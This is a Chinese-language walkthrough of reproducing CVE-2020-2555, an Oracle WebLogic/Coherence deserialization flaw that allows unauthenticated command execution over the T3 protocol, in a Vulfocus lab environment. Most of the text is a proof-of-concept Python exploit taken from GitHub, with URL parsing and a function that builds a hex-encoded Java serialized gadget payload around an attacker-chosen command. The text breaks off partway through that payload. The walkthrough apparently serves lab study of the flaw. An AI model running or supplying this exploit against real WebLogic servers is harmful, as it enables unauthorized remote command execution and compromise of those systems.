weblogic-cve_2020_2555漏洞复现
漏洞概述:
该漏洞于2020年1月在网上爆出,属于weblogic反序列化漏洞,漏洞原因是Oracle Fusion中间件 Oracle Coherence 存在缺陷,攻击者可利用该漏洞在未经授权下通过构造T3协议请求,获取 Weblogic 服务器权限,执行任意命令。
漏洞复现:
Vulfocus平台拉取下载启动漏洞镜像环境:
访问漏洞环境地址端口11317,该端口映射在weblogic的服务端口7001,在url地址栏输入ip端口后添加console进行访问
在GitHub上下载攻击poc
# -*- coding: utf-8 -*-
import socket
import time
import ssl
import binascii
import urlparse
import argparse
import sys
globalProxies = {}
header = {
'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0"
}
def parseUrl(url):
parsed = urlparse.urlparse(url)
proto = parsed.scheme
netloc = parsed.netloc
ip = netloc
if proto == 'http':
port = 80
else:
port = 443
if (':' in netloc):
ip = netloc.split(':')[0]
port = netloc.split(':')[1]
uri = parsed.path
return (proto, ip, port, uri)
def CVE_2020_2555(cmd):
payload_start =
'aced00057372002e6a617661782e6d616e6167656d656e742e42616441747472696275746556616c7565457870457863657074696f6ed4e7daab632d46400200014c000376616c7400124c6a6176612f6c616e672f4f626a6563743b787200136a6176612e6c616e672e457863657074696f6ed0fd1f3e1a3b1cc4020000787200136a6176612e6c616e672e5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d6573736167657400124c6a6176612f6c616e672f537472696e673b5b000a737461636b547261636574001e5b4c6a6176612f6c616e672f537461636b5472616365456c656d656e743b4c001473757070726573736564457863657074696f6e737400104c6a6176612f7574696c2f4c6973743b787071007e0008707572001e5b4c6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c3cfd22390200007870000000037372001b6a6176612e6c616e672e537461636b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e756d6265724c000e6465636c6172696e67436c61737371007e00054c000866696c654